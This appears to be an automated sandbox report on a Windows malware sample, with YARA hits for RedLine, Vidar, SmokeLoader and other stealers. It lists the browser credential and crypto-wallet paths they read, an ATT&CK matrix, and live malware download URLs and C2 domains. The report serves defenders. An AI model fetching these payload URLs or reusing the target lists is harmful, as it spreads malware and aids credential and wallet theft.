                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Entity.Design\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Entity.Design.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013E8386 cpuid
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 0_2_004020E1 GetHandleInformation,GradientFill,GetSystemTimeAsFileTime,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_0040A8A0 GetProcessHeap,HeapAlloc,_memset,GetTimeZoneInformation,wsprintfA,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_0040A800 GetProcessHeap,HeapAlloc,GetUserNameA,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00406760 _memset,_memset,GetVersionExA,LoadLibraryA,WideCharToMultiByte,WideCharToMultiByte,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,WideCharToMultiByte,lstrcatA,lstrcatA,lstrcatA,WideCharToMultiByte,lstrcatA,lstrcatA,lstrcatA,lstrcatA,WideCharToMultiByte,lstrcatA,FreeLibrary,
                        Source: C169.exe, 00000017.00000002.605075446.0000000006842000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                        Stealing of Sensitive Information:

                        Yara detected RedLine Stealer
                        Source: Yara matchFile source: 23.2.C169.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.C169.exe.3dd5e88.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.C169.exe.400000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.C169.exe.3dd5e88.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.C169.exe.400000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.C169.exe.400000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.A70A.exe.12e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.C169.exe.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.C169.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000B.00000002.573313266.00000000012E2000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.476958517.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.466738621.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000002.568172041.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.471013875.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.472952857.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.499816087.0000000003BB1000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: A70A.exe PID: 3340, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: C169.exe PID: 6276, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: C169.exe PID: 2256, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Yara detected Cryptbot
                        Source: Yara matchFile source: 0000001A.00000003.478772499.00000000008C0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000002.570490408.0000000000915000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: D375.exe PID: 6632, type: MEMORYSTR
                        Yara detected SmokeLoader
                        Source: Yara matchFile source: 0000001C.00000002.503480050.00000000005B1000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.374208740.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001C.00000002.503274211.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.353435896.0000000004E91000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.435228556.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.374186262.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.435588764.00000000006B1000.00000004.00020000.sdmp, type: MEMORY
                        Yara detected Amadey bot
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Yara detected Vidar stealer
                        Source: Yara matchFile source: 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: AA02.exe PID: 5976, type: MEMORYSTR
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: A70A.exe, 0000000B.00000002.601972098.0000000003DB2000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Electrum\wallets
                        Source: AA02.exe, 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmpString found in binary or memory: \ElectronCash\wallets\
                        Source: A70A.exe, 0000000B.00000002.601972098.0000000003DB2000.00000004.00000001.sdmpString found in binary or memory: Bm1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                        Source: A70A.exe, 0000000B.00000002.601972098.0000000003DB2000.00000004.00000001.sdmpString found in binary or memory: Bm-cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
                        Source: AA02.exe, 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmpString found in binary or memory: window-state.json
                        Source: AA02.exe, 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmpString found in binary or memory: exodus.conf.json
                        Source: A70A.exe, 0000000B.00000002.601972098.0000000003DB2000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                        Source: AA02.exe, 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmpString found in binary or memory: info.seco
                        Source: AA02.exe, 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmpString found in binary or memory: ElectrumLTC
                        Source: AA02.exe, 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmpString found in binary or memory: \jaxx\Local Storage\
                        Source: AA02.exe, 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmpString found in binary or memory: passphrase.json
                        Source: A70A.exe, 0000000B.00000002.601972098.0000000003DB2000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Ethereum\wallets
                        Source: AA02.exe, 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmpString found in binary or memory: file__0.localstorage
                        Source: AA02.exe, 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmpString found in binary or memory: default_wallet
                        Source: A70A.exe, 0000000B.00000002.601972098.0000000003DB2000.00000004.00000001.sdmpString found in binary or memory: Bm5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                        Source: AA02.exe, 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmpString found in binary or memory: multidoge.wallet
                        Source: AA02.exe, 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmpString found in binary or memory: seed.seco
                        Source: A70A.exe, 0000000B.00000002.573313266.00000000012E2000.00000040.00020000.sdmpString found in binary or memory: set_UseMachineKeyStore
                        Source: AA02.exe, 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Tries to steal Crypto Currency Wallets
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                        Source: Yara matchFile source: 0000001A.00000003.478772499.00000000008C0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000016.00000002.528038196.00000000008A5000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000002.570490408.0000000000915000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: A70A.exe PID: 3340, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: AA02.exe PID: 5976, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: D375.exe PID: 6632, type: MEMORYSTR

                        Remote Access Functionality:

                        Yara detected RedLine Stealer
                        Source: Yara matchFile source: 23.2.C169.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.C169.exe.3dd5e88.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.C169.exe.400000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.C169.exe.3dd5e88.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.C169.exe.400000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.C169.exe.400000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.A70A.exe.12e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.C169.exe.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.C169.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000B.00000002.573313266.00000000012E2000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.476958517.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.466738621.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000002.568172041.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.471013875.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.472952857.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.499816087.0000000003BB1000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: A70A.exe PID: 3340, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: C169.exe PID: 6276, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: C169.exe PID: 2256, type: MEMORYSTR
                        Source: Yara match | File source: dump.pcap, type: PCAP
                        Yara detected Cryptbot
                        Source: Yara match | File source: Process Memory Space: D375.exe PID: 6632, type: MEMORYSTR
                        Yara detected SmokeLoader
                        Yara detected Vidar stealer
                        Source: Yara match | File source: Process Memory Space: AA02.exe PID: 5976, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                        Valid Accounts | Native API 11 | DLL Side-Loading 1 | DLL Side-Loading 1 | Disable or Modify Tools 1 | OS Credential Dumping 1 | System Time Discovery 2 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 14 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                        Default Accounts | Exploitation for Client Execution 1 | Application Shimming 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 11 | Input Capture 1 | Account Discovery 1 | Remote Desktop Protocol | Data from Local System 3 | Exfiltration Over Bluetooth | Encrypted Channel 21 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                        Domain Accounts | Command and Scripting Interpreter 2 | Logon Script (Windows) | Process Injection 512 | Obfuscated Files or Information 4 | Security Account Manager | File and Directory Discovery 3 | SMB/Windows Admin Shares | Input Capture 1 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                        Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing 34 | NTDS | System Information Discovery 165 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 4 | SIM Card Swap | | Carrier Billing Fraud
                        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Timestomp 1 | LSA Secrets | Query Registry 1 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 25 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                        Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading 1 | Cached Domain Credentials | Security Software Discovery 10101 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                        External Remote Services | Scheduled Task | Startup Items | Startup Items | File Deletion 1 | DCSync | Process Discovery 12 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Masquerading 11 | Proc Filesystem | Virtualization/Sandbox Evasion 471 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                        Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Virtualization/Sandbox Evasion 471 | /etc/passwd and /etc/shadow | Application Window Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
                        Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Process Injection 512 | Network Sniffing | System Owner/User Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
                        Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Hidden Files and Directories 1 | Input Capture | Remote System Discovery 1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop

                        Behavior Graph

                        [Behavior graph image not reproduced. Behavior Graph ID: 531737, Sample: QMn13jz6nj.exe, Startdate: 01/12/2021, Architecture: WINDOWS, Score: 100]

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        Source | Detection | Scanner | Label
                        QMn13jz6nj.exe | 47% | Virustotal |
                        QMn13jz6nj.exe | 100% | Joe Sandbox ML |

                        Dropped Files

                        Source | Detection | Scanner | Label
                        C:\Users\user\AppData\Local\Temp\C169.exe | 100% | Avira | HEUR/AGEN.1144480
                        C:\Users\user\AppData\Local\Temp\D375.exe | 100% | Avira | TR/Crypt.XPACK.Gen2
                        C:\Users\user\AppData\Local\Temp\D466.exe | 100% | Joe Sandbox ML |
                        C:\Users\user\AppData\Local\Temp\AA02.exe | 100% | Joe Sandbox ML |
                        C:\Users\user\AppData\Local\Temp\C169.exe | 100% | Joe Sandbox ML |
                        C:\Users\user\AppData\Local\Temp\B6B5.exe | 100% | Joe Sandbox ML |
                        C:\Users\user\AppData\Local\Temp\A70A.exe | 100% | Joe Sandbox ML |
                        C:\Users\user\AppData\Roaming\ddigjgj | 100% | Joe Sandbox ML |
                        C:\Users\user\AppData\Local\Temp\D375.exe | 100% | Joe Sandbox ML |
                        C:\ProgramData\sqlite3.dll | 3% | Metadefender |
                        C:\ProgramData\sqlite3.dll | 0% | ReversingLabs |
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sqlite3[1].dll | 3% | Metadefender |
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sqlite3[1].dll | 0% | ReversingLabs |
                        C:\Users\user\AppData\Local\Temp\A70A.exe | 26% | Metadefender |
                        C:\Users\user\AppData\Local\Temp\A70A.exe | 57% | ReversingLabs | Win32.Trojan.Generic
                        C:\Users\user\AppData\Local\Temp\C169.exe | 37% | Metadefender |
                        C:\Users\user\AppData\Local\Temp\C169.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
                        C:\Users\user\AppData\Local\Temp\D375.exe | 43% | Metadefender |
                        C:\Users\user\AppData\Local\Temp\D375.exe | 86% | ReversingLabs | Win32.Trojan.SelfDel
                        C:\Users\user\AppData\Local\Temp\D466.exe | 29% | Metadefender |
                        C:\Users\user\AppData\Local\Temp\D466.exe | 51% | ReversingLabs | Win32.Trojan.Lockbit

                        Unpacked PE Files


                        Domains

                        No Antivirus matches

                        URLs


                        Domains and IPs

                        Contacted Domains

                        Name | IP | Active | Malicious | Antivirus Detection | Reputation
                        host-data-coin-11.com | 95.213.165.249 | true | false | | high
                        privacytoolzforyou-7000.com | 95.213.165.249 | true | false | | high
                        cdn.discordapp.com | 162.159.135.233 | true | false | | high
                        host-file-host-3.com | 95.213.165.249 | true | false | | high
                        www.google.com | 142.250.184.100 | true | false | | high
                        file-file-host4.com | 95.213.165.249 | true | false | | high
                        unic7m.top | unknown | unknown | false | | high

                                      Contacted URLs

                        Name | Malicious | Antivirus Detection | Reputation
                        http://host-file-host-3.com/files/8723_1638191106_2017.exe | true | 3%, Virustotal; Avira URL Cloud: malware | unknown
                        http://host-file-host-3.com/files/5311_1638303032_7343.exe | true | Avira URL Cloud: malware | unknown
                        http://host-file-host-3.com/files/6096_1638289274_6885.exe | true | Avira URL Cloud: malware | unknown
                        http://host-file-host-3.com/game.exe | false | Avira URL Cloud: safe | unknown
                        https://cdn.discordapp.com/attachments/914960103592054858/914961866462232616/Oldening.exe | false | | high
                        http://privacytoolzforyou-7000.com/downloads/toolspab3.exe | true | Avira URL Cloud: malware | unknown
                        http://file-file-host4.com/sqlite3.dll | false | URL Reputation: safe | unknown

                                        URLs from Memory and Binaries

                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsatA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://tempuri.org/Entity/Id15ResponseA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601972098.0000000003DB2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.jsA70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://api.ip.sb/ipA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000010.00000002.499816087.0000000003BB1000.00000004.00000001.sdmp, C169.exe, 00000017.00000000.476958517.0000000000402000.00000040.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://microsoft.coC169.exe, 00000017.00000002.605485647.00000000068A5000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://socfinder.site/A70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598194373.0000000003016000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594596354.0000000002DF3000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      http://tempuri.org/Entity/Id24ResponseA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.597967542.0000000002FE1000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2004/08/addressingA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://support.google.com/chrome/?p=plugin_shockwaveC169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              https://cdn.discordapp.com/attachments/914960103592054858/914986994759794738/Underdosed.exeC169.exe, 00000017.00000002.593626249.0000000002CE0000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.597625234.0000000002F9B000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://tempuri.org/Entity/Id5ResponseA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultDC169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://tempuri.org/Entity/Id10ResponseA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601972098.0000000003DB2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RenewA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://tempuri.org/Entity/Id8ResponseA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://support.google.com/chrome/?p=plugin_wmpA70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://95.181.152.139C169.exe, 00000017.00000002.597347533.0000000002F77000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/ws/2006/02/addressingidentityA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593626249.0000000002CE0000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                    high
